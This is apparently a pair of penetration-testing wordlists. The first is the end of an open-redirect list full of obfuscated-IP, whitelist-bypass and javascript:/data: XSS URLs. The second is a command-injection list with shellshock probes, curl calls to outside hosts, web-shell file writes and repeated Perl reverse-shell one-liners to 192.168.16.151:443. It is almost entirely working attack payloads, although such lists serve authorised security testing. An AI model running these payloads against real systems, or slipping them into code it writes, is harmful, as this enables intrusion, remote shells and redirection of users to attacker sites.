| http://3H6k7lIAiqjfNeN@472.314.470.462 443 | http://XY>.7d8T\205pZM@472.314.470.462 444 | http://0330.072.0326.0316 445 | http://www.whitelisteddomain.tld@0330.072.0326.0316 446 | http://3H6k7lIAiqjfNeN@0330.072.0326.0316 447 | http://XY>.7d8T\205pZM@0330.072.0326.0316 448 | http://00330.00072.0000326.00000316 449 | http://www.whitelisteddomain.tld@00330.00072.0000326.00000316 450 | http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316 451 | http://XY>.7d8T\205pZM@00330.00072.0000326.00000316 452 | http://[::216.58.214.206] 453 | http://www.whitelisteddomain.tld@[::216.58.214.206] 454 | http://3H6k7lIAiqjfNeN@[::216.58.214.206] 455 | http://XY>.7d8T\205pZM@[::216.58.214.206] 456 | http://[::ffff:216.58.214.206] 457 | http://www.whitelisteddomain.tld@[::ffff:216.58.214.206] 458 | http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206] 459 | http://XY>.7d8T\205pZM@[::ffff:216.58.214.206] 460 | http://0xd8.072.54990 461 | http://www.whitelisteddomain.tld@0xd8.072.54990 462 | http://3H6k7lIAiqjfNeN@0xd8.072.54990 463 | http://XY>.7d8T\205pZM@0xd8.072.54990 464 | http://0xd8.3856078 465 | http://www.whitelisteddomain.tld@0xd8.3856078 466 | http://3H6k7lIAiqjfNeN@0xd8.3856078 467 | http://XY>.7d8T\205pZM@0xd8.3856078 468 | http://00330.3856078 469 | http://www.whitelisteddomain.tld@00330.3856078 470 | http://3H6k7lIAiqjfNeN@00330.3856078 471 | http://XY>.7d8T\205pZM@00330.3856078 472 | http://00330.0x3a.54990 473 | http://www.whitelisteddomain.tld@00330.0x3a.54990 474 | http://3H6k7lIAiqjfNeN@00330.0x3a.54990 475 | http://XY>.7d8T\205pZM@00330.0x3a.54990 476 | http:0xd8.0x3a.0xd6.0xce 477 | http:www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce 478 | http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce 479 | http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce 480 | http:0xd83ad6ce 481 | http:www.whitelisteddomain.tld@0xd83ad6ce 482 | http:3H6k7lIAiqjfNeN@0xd83ad6ce 483 | http:XY>.7d8T\205pZM@0xd83ad6ce 484 | http:3627734734 485 | http:www.whitelisteddomain.tld@3627734734 486 | http:3H6k7lIAiqjfNeN@3627734734 487 | http:XY>.7d8T\205pZM@3627734734 488 | http:472.314.470.462 489 | http:www.whitelisteddomain.tld@472.314.470.462 490 | http:3H6k7lIAiqjfNeN@472.314.470.462 491 | http:XY>.7d8T\205pZM@472.314.470.462 492 | http:0330.072.0326.0316 493 | http:www.whitelisteddomain.tld@0330.072.0326.0316 494 | http:3H6k7lIAiqjfNeN@0330.072.0326.0316 495 | http:XY>.7d8T\205pZM@0330.072.0326.0316 496 | http:00330.00072.0000326.00000316 497 | http:www.whitelisteddomain.tld@00330.00072.0000326.00000316 498 | http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316 499 | http:XY>.7d8T\205pZM@00330.00072.0000326.00000316 500 | http:[::216.58.214.206] 501 | http:www.whitelisteddomain.tld@[::216.58.214.206] 502 | http:3H6k7lIAiqjfNeN@[::216.58.214.206] 503 | http:XY>.7d8T\205pZM@[::216.58.214.206] 504 | http:[::ffff:216.58.214.206] 505 | http:www.whitelisteddomain.tld@[::ffff:216.58.214.206] 506 | http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206] 507 | http:XY>.7d8T\205pZM@[::ffff:216.58.214.206] 508 | http:0xd8.072.54990 509 | http:www.whitelisteddomain.tld@0xd8.072.54990 510 | http:3H6k7lIAiqjfNeN@0xd8.072.54990 511 | http:XY>.7d8T\205pZM@0xd8.072.54990 512 | http:0xd8.3856078 513 | http:www.whitelisteddomain.tld@0xd8.3856078 514 | http:3H6k7lIAiqjfNeN@0xd8.3856078 515 | http:XY>.7d8T\205pZM@0xd8.3856078 516 | http:00330.3856078 517 | http:www.whitelisteddomain.tld@00330.3856078 518 | http:3H6k7lIAiqjfNeN@00330.3856078 519 | http:XY>.7d8T\205pZM@00330.3856078 520 | http:00330.0x3a.54990 521 | http:www.whitelisteddomain.tld@00330.0x3a.54990 522 | http:3H6k7lIAiqjfNeN@00330.0x3a.54990 523 | http:XY>.7d8T\205pZM@00330.0x3a.54990 524 | 〱localdomain.pw 525 | 〵localdomain.pw 526 | ゝlocaldomain.pw 527 | ーlocaldomain.pw 528 | ーlocaldomain.pw 529 | /〱localdomain.pw 530 | /〵localdomain.pw 531 | /ゝlocaldomain.pw 532 | /ーlocaldomain.pw 533 | /ーlocaldomain.pw 534 | %68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d 535 | http://%67%6f%6f%67%6c%65%2e%63%6f%6d 536 | <>javascript:alert(1); 537 | <>//localdomain.pw 538 | //localdomain.pw\@www.whitelisteddomain.tld 539 | https://:@localdomain.pw\@www.whitelisteddomain.tld 540 | \x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1) 541 | \u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1) 542 | ja\nva\tscript\r:alert(1) 543 | \j\av\a\s\cr\i\pt\:\a\l\ert\(1\) 544 | \152\141\166\141\163\143\162\151\160\164\072alert(1) 545 | http://localdomain.pw:80#@www.whitelisteddomain.tld/ 546 | http://localdomain.pw:80?@www.whitelisteddomain.tld/ 547 | http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld+@localdomain.pw/ 548 | http://XY>.7d8T\205pZM@www.whitelisteddomain.tld+@localdomain.pw/ 549 | http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@localdomain.pw/ 550 | http://XY>.7d8T\205pZM@www.whitelisteddomain.tld@localdomain.pw/ 551 | http://www.whitelisteddomain.tld+&@localdomain.pw#+@www.whitelisteddomain.tld/ 552 | http://localdomain.pw\twww.whitelisteddomain.tld/ 553 | //localdomain.pw:80#@www.whitelisteddomain.tld/ 554 | //localdomain.pw:80?@www.whitelisteddomain.tld/ 555 | //3H6k7lIAiqjfNeN@www.whitelisteddomain.tld+@localdomain.pw/ 556 | //XY>.7d8T\205pZM@www.whitelisteddomain.tld+@localdomain.pw/ 557 | //3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@localdomain.pw/ 558 | //XY>.7d8T\205pZM@www.whitelisteddomain.tld@localdomain.pw/ 559 | //www.whitelisteddomain.tld+&@localdomain.pw#+@www.whitelisteddomain.tld/ 560 | //localdomain.pw\twww.whitelisteddomain.tld/ 561 | //;@localdomain.pw 562 | http://;@localdomain.pw 563 | @localdomain.pw 564 | javascript://https://www.whitelisteddomain.tld/?z=%0Aalert(1) 565 | data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4= 566 | http://localdomain.pw%2f%2f.www.whitelisteddomain.tld/ 567 | http://localdomain.pw%5c%5c.www.whitelisteddomain.tld/ 568 | http://localdomain.pw%3F.www.whitelisteddomain.tld/ 569 | http://localdomain.pw%23.www.whitelisteddomain.tld/ 570 | http://www.whitelisteddomain.tld:80%40localdomain.pw/ 571 | http://www.whitelisteddomain.tld%2elocaldomain.pw/ 572 | /x:1/:///%01javascript:alert(document.cookie)/ 573 | /https:/%5clocaldomain.pw/ 574 | javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie) 575 | /http://localdomain.pw 576 | /%2f%2flocaldomain.pw 577 | /localdomain.pw/%2f%2e%2e 578 | /http:/localdomain.pw 579 | /.localdomain.pw 580 | http://.localdomain.pw 581 | .localdomain.pw 582 | ///\;@localdomain.pw 583 | ///localdomain.pw 584 | /////localdomain.pw/ 585 | /////localdomain.pw 586 | java%0ascript:alert(1) 587 | java%09script:alert(1) 588 | java%0dscript:alert(1) 589 | javascript://%0aalert(1) 590 | Javas%26%2399;ript:alert(1) 591 | data:www.whitelisteddomain.tld;text/html;charset=UTF-8, 592 | jaVAscript://www.whitelisteddomain.tld//%0d%0aalert(1);// 593 | http://www.localdomain.pw\.www.whitelisteddomain.tld 594 | %19Jav%09asc%09ript:https%20://www.whitelisteddomain.tld/%250Aconfirm%25281%2529 595 | //example.com@google.com/%2f.. 596 | ///google.com/%2f.. 597 | ///example.com@google.com/%2f.. 598 | ////google.com/%2f.. 599 | ////example.com@google.com/%2f.. 600 | https://google.com/%2f.. 601 | https://example.com@google.com/%2f.. 602 | /https://google.com/%2f.. 603 | /https://example.com@google.com/%2f.. 604 | //google.com/%2f%2e%2e 605 | //example.com@google.com/%2f%2e%2e 606 | ///google.com/%2f%2e%2e 607 | ///example.com@google.com/%2f%2e%2e 608 | ////google.com/%2f%2e%2e 609 | ////example.com@google.com/%2f%2e%2e 610 | https://google.com/%2f%2e%2e 611 | https://example.com@google.com/%2f%2e%2e 612 | /https://google.com/%2f%2e%2e 613 | /https://example.com@google.com/%2f%2e%2e 614 | //google.com/ 615 | //example.com@google.com/ 616 | ///google.com/ 617 | ///example.com@google.com/ 618 | ////google.com/ 619 | ////example.com@google.com/ 620 | https://google.com/ 621 | https://example.com@google.com/ 622 | /https://google.com/ 623 | /https://example.com@google.com/ 624 | //google.com// 625 | //example.com@google.com// 626 | ///google.com// 627 | ///example.com@google.com// 628 | ////google.com// 629 | ////example.com@google.com// 630 | https://google.com// 631 | https://example.com@google.com// 632 | //https://google.com// 633 | //https://example.com@google.com// 634 | //google.com/%2e%2e%2f 635 | //example.com@google.com/%2e%2e%2f 636 | ///google.com/%2e%2e%2f 637 | ///example.com@google.com/%2e%2e%2f 638 | ////google.com/%2e%2e%2f 639 | ////example.com@google.com/%2e%2e%2f 640 | https://google.com/%2e%2e%2f 641 | https://example.com@google.com/%2e%2e%2f 642 | //https://google.com/%2e%2e%2f 643 | //https://example.com@google.com/%2e%2e%2f 644 | ///google.com/%2e%2e 645 | ///example.com@google.com/%2e%2e 646 | ////google.com/%2e%2e 647 | ////example.com@google.com/%2e%2e 648 | https:///google.com/%2e%2e 649 | https:///example.com@google.com/%2e%2e 650 | //https:///google.com/%2e%2e 651 | //example.com@https:///google.com/%2e%2e 652 | /https://google.com/%2e%2e 653 | /https://example.com@google.com/%2e%2e 654 | ///google.com/%2f%2e%2e 655 | ///example.com@google.com/%2f%2e%2e 656 | ////google.com/%2f%2e%2e 657 | ////example.com@google.com/%2f%2e%2e 658 | https:///google.com/%2f%2e%2e 659 | https:///example.com@google.com/%2f%2e%2e 660 | /https://google.com/%2f%2e%2e 661 | /https://example.com@google.com/%2f%2e%2e 662 | /https:///google.com/%2f%2e%2e 663 | /https:///example.com@google.com/%2f%2e%2e 664 | /%09/google.com 665 | /%09/example.com@google.com 666 | //%09/google.com 667 | //%09/example.com@google.com 668 | ///%09/google.com 669 | ///%09/example.com@google.com 670 | ////%09/google.com 671 | ////%09/example.com@google.com 672 | https://%09/google.com 673 | https://%09/example.com@google.com 674 | /%5cgoogle.com 675 | /%5cexample.com@google.com 676 | //%5cgoogle.com 677 | //%5cexample.com@google.com 678 | ///%5cgoogle.com 679 | ///%5cexample.com@google.com 680 | ////%5cgoogle.com 681 | ////%5cexample.com@google.com 682 | https://%5cgoogle.com 683 | https://%5cexample.com@google.com 684 | /https://%5cgoogle.com 685 | /https://%5cexample.com@google.com 686 | https://google.com 687 | https://example.com@google.com 688 | javascript:alert(1); 689 | javascript:alert(1) 690 | //javascript:alert(1); 691 | /javascript:alert(1); 692 | //javascript:alert(1) 693 | /javascript:alert(1) 694 | /%5cjavascript:alert(1); 695 | /%5cjavascript:alert(1) 696 | //%5cjavascript:alert(1); 697 | //%5cjavascript:alert(1) 698 | /%09/javascript:alert(1); 699 | /%09/javascript:alert(1) 700 | java%0d%0ascript%0d%0a:alert(0) 701 | //google.com 702 | https:google.com 703 | //google%E3%80%82com 704 | \/\/google.com/ 705 | /\/google.com/ 706 | //google%00.com 707 | https://example.com/https://google.com/ 708 | ";alert(0);// 709 | javascript://example.com?%a0alert%281%29 710 | http://0xd8.0x3a.0xd6.0xce 711 | http://example.com@0xd8.0x3a.0xd6.0xce 712 | http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce 713 | http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce 714 | http://0xd83ad6ce 715 | http://example.com@0xd83ad6ce 716 | http://3H6k7lIAiqjfNeN@0xd83ad6ce 717 | http://XY>.7d8T\205pZM@0xd83ad6ce 718 | http://3627734734 719 | http://example.com@3627734734 720 | http://3H6k7lIAiqjfNeN@3627734734 721 | http://XY>.7d8T\205pZM@3627734734 722 | http://472.314.470.462 723 | http://example.com@472.314.470.462 724 | http://3H6k7lIAiqjfNeN@472.314.470.462 725 | http://XY>.7d8T\205pZM@472.314.470.462 726 | http://0330.072.0326.0316 727 | http://example.com@0330.072.0326.0316 728 | http://3H6k7lIAiqjfNeN@0330.072.0326.0316 729 | http://XY>.7d8T\205pZM@0330.072.0326.0316 730 | http://00330.00072.0000326.00000316 731 | http://example.com@00330.00072.0000326.00000316 732 | http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316 733 | http://XY>.7d8T\205pZM@00330.00072.0000326.00000316 734 | http://[::216.58.214.206] 735 | http://example.com@[::216.58.214.206] 736 | http://3H6k7lIAiqjfNeN@[::216.58.214.206] 737 | http://XY>.7d8T\205pZM@[::216.58.214.206] 738 | http://[::ffff:216.58.214.206] 739 | http://example.com@[::ffff:216.58.214.206] 740 | http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206] 741 | http://XY>.7d8T\205pZM@[::ffff:216.58.214.206] 742 | http://0xd8.072.54990 743 | http://example.com@0xd8.072.54990 744 | http://3H6k7lIAiqjfNeN@0xd8.072.54990 745 | http://XY>.7d8T\205pZM@0xd8.072.54990 746 | http://0xd8.3856078 747 | http://example.com@0xd8.3856078 748 | http://3H6k7lIAiqjfNeN@0xd8.3856078 749 | http://XY>.7d8T\205pZM@0xd8.3856078 750 | http://00330.3856078 751 | http://example.com@00330.3856078 752 | http://3H6k7lIAiqjfNeN@00330.3856078 753 | http://XY>.7d8T\205pZM@00330.3856078 754 | http://00330.0x3a.54990 755 | http://example.com@00330.0x3a.54990 756 | http://3H6k7lIAiqjfNeN@00330.0x3a.54990 757 | http://XY>.7d8T\205pZM@00330.0x3a.54990 758 | http:0xd8.0x3a.0xd6.0xce 759 | http:example.com@0xd8.0x3a.0xd6.0xce 760 | http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce 761 | http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce 762 | http:0xd83ad6ce 763 | http:example.com@0xd83ad6ce 764 | http:3H6k7lIAiqjfNeN@0xd83ad6ce 765 | http:XY>.7d8T\205pZM@0xd83ad6ce 766 | http:3627734734 767 | http:example.com@3627734734 768 | http:3H6k7lIAiqjfNeN@3627734734 769 | http:XY>.7d8T\205pZM@3627734734 770 | http:472.314.470.462 771 | http:example.com@472.314.470.462 772 | http:3H6k7lIAiqjfNeN@472.314.470.462 773 | http:XY>.7d8T\205pZM@472.314.470.462 774 | http:0330.072.0326.0316 775 | http:example.com@0330.072.0326.0316 776 | http:3H6k7lIAiqjfNeN@0330.072.0326.0316 777 | http:XY>.7d8T\205pZM@0330.072.0326.0316 778 | http:00330.00072.0000326.00000316 779 | http:example.com@00330.00072.0000326.00000316 780 | http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316 781 | http:XY>.7d8T\205pZM@00330.00072.0000326.00000316 782 | http:[::216.58.214.206] 783 | http:example.com@[::216.58.214.206] 784 | http:3H6k7lIAiqjfNeN@[::216.58.214.206] 785 | http:XY>.7d8T\205pZM@[::216.58.214.206] 786 | http:[::ffff:216.58.214.206] 787 | http:example.com@[::ffff:216.58.214.206] 788 | http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206] 789 | http:XY>.7d8T\205pZM@[::ffff:216.58.214.206] 790 | http:0xd8.072.54990 791 | http:example.com@0xd8.072.54990 792 | http:3H6k7lIAiqjfNeN@0xd8.072.54990 793 | http:XY>.7d8T\205pZM@0xd8.072.54990 794 | http:0xd8.3856078 795 | http:example.com@0xd8.3856078 796 | http:3H6k7lIAiqjfNeN@0xd8.3856078 797 | http:XY>.7d8T\205pZM@0xd8.3856078 798 | http:00330.3856078 799 | http:example.com@00330.3856078 800 | http:3H6k7lIAiqjfNeN@00330.3856078 801 | http:XY>.7d8T\205pZM@00330.3856078 802 | http:00330.0x3a.54990 803 | http:example.com@00330.0x3a.54990 804 | http:3H6k7lIAiqjfNeN@00330.0x3a.54990 805 | http:XY>.7d8T\205pZM@00330.0x3a.54990 806 | 〱google.com 807 | 〵google.com 808 | ゝgoogle.com 809 | ーgoogle.com 810 | ーgoogle.com 811 | /〱google.com 812 | /〵google.com 813 | /ゝgoogle.com 814 | /ーgoogle.com 815 | /ーgoogle.com 816 | %68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d 817 | http://%67%6f%6f%67%6c%65%2e%63%6f%6d 818 | <>javascript:alert(1); 819 | <>//google.com 820 | //google.com\@example.com 821 | https://:@google.com\@example.com 822 | \x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1) 823 | \u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1) 824 | ja\nva\tscript\r:alert(1) 825 | \j\av\a\s\cr\i\pt\:\a\l\ert\(1\) 826 | \152\141\166\141\163\143\162\151\160\164\072alert(1) 827 | http://google.com:80#@example.com/ 828 | http://google.com:80?@example.com/ 829 | http://3H6k7lIAiqjfNeN@example.com+@google.com/ 830 | http://XY>.7d8T\205pZM@example.com+@google.com/ 831 | http://3H6k7lIAiqjfNeN@example.com@google.com/ 832 | http://XY>.7d8T\205pZM@example.com@google.com/ 833 | http://example.com+&@google.com#+@example.com/ 834 | http://google.com\texample.com/ 835 | //google.com:80#@example.com/ 836 | //google.com:80?@example.com/ 837 | //3H6k7lIAiqjfNeN@example.com+@google.com/ 838 | //XY>.7d8T\205pZM@example.com+@google.com/ 839 | //3H6k7lIAiqjfNeN@example.com@google.com/ 840 | //XY>.7d8T\205pZM@example.com@google.com/ 841 | //example.com+&@google.com#+@example.com/ 842 | //google.com\texample.com/ 843 | //;@google.com 844 | http://;@google.com 845 | @google.com 846 | javascript://https://example.com/?z=%0Aalert(1) 847 | data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4= 848 | http://google.com%2f%2f.example.com/ 849 | http://google.com%5c%5c.example.com/ 850 | http://google.com%3F.example.com/ 851 | http://google.com%23.example.com/ 852 | http://example.com:80%40google.com/ 853 | http://example.com%2egoogle.com/ 854 | /x:1/:///%01javascript:alert(document.cookie)/ 855 | /https:/%5cgoogle.com/ 856 | javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie) 857 | /http://google.com 858 | /%2f%2fgoogle.com 859 | /google.com/%2f%2e%2e 860 | /http:/google.com 861 | /.google.com 862 | ///\;@google.com 863 | ///google.com 864 | /////google.com/ 865 | -------------------------------------------------------------------------------- /wordlists/windows-cmd-injection.txt: -------------------------------------------------------------------------------- 1 | ` 2 | || 3 | | 4 | ; 5 | ' 6 | '" 7 | " 8 | "' 9 | & 10 | && 11 | %0a 12 | %0a%0d 13 | 14 | %0Aid 15 | %0a id %0a 16 | %0Aid%0A 17 | %0a ping -i 30 127.0.0.1 %0a 18 | %0A/usr/bin/id 19 | %0A/usr/bin/id%0A 20 | %2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1 21 | %20{${phpinfo()}} 22 | %20{${sleep(20)}} 23 | %20{${sleep(3)}} 24 | a|id| 25 | a;id| 26 | a;id; 27 | a;id\n 28 | () { :;}; curl http://135.23.158.130/.testing/shellshock.txt?vuln=12 29 | | curl http://crowdshield.com/.testing/rce.txt 30 | & curl http://crowdshield.com/.testing/rce.txt 31 | ; curl https://crowdshield.com/.testing/rce_vuln.txt 32 | && curl https://crowdshield.com/.testing/rce_vuln.txt 33 | curl https://crowdshield.com/.testing/rce_vuln.txt 34 | curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt 35 | curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt 36 | $(`curl https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`) 37 | dir 38 | | dir 39 | ; dir 40 | $(`dir`) 41 | & dir 42 | &&dir 43 | && dir 44 | | dir C:\ 45 | ; dir C:\ 46 | & dir C:\ 47 | && dir C:\ 48 | dir C:\ 49 | | dir C:\Documents and Settings\* 50 | ; dir C:\Documents and Settings\* 51 | & dir C:\Documents and Settings\* 52 | && dir C:\Documents and Settings\* 53 | dir C:\Documents and Settings\* 54 | | dir C:\Users 55 | ; dir C:\Users 56 | & dir C:\Users 57 | && dir C:\Users 58 | dir C:\Users 59 | ;echo%20'' 60 | echo ''// XXXXXXXXXXX 61 | | echo "" > rfi.php 62 | ; echo "" > rfi.php 63 | & echo "" > rfi.php 64 | && echo "" > rfi.php 65 | echo "" > rfi.php 66 | | echo "" > dir.php 67 | ; echo "" > dir.php 68 | & echo "" > dir.php 69 | && echo "" > dir.php 70 | echo "" > dir.php 71 | | echo "" > cmd.php 72 | ; echo "" > cmd.php 73 | & echo "" > cmd.php 74 | && echo "" > cmd.php 75 | echo "" > cmd.php 76 | ;echo '' 77 | echo ''// XXXXXXXXXXX 78 | echo ''// XXXXXXXXXXX 79 | | echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl 80 | ; echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl 81 | & echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl 82 | && echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl 83 | echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl 84 | () { :;}; echo vulnerable 10 85 | eval('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') 86 | eval('ls') 87 | eval('pwd') 88 | eval('pwd'); 89 | eval('sleep 5') 90 | eval('sleep 5'); 91 | eval('whoami') 92 | eval('whoami'); 93 | exec('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') 94 | exec('ls') 95 | exec('pwd') 96 | exec('pwd'); 97 | exec('sleep 5') 98 | exec('sleep 5'); 99 | exec('whoami') 100 | exec('whoami'); 101 | 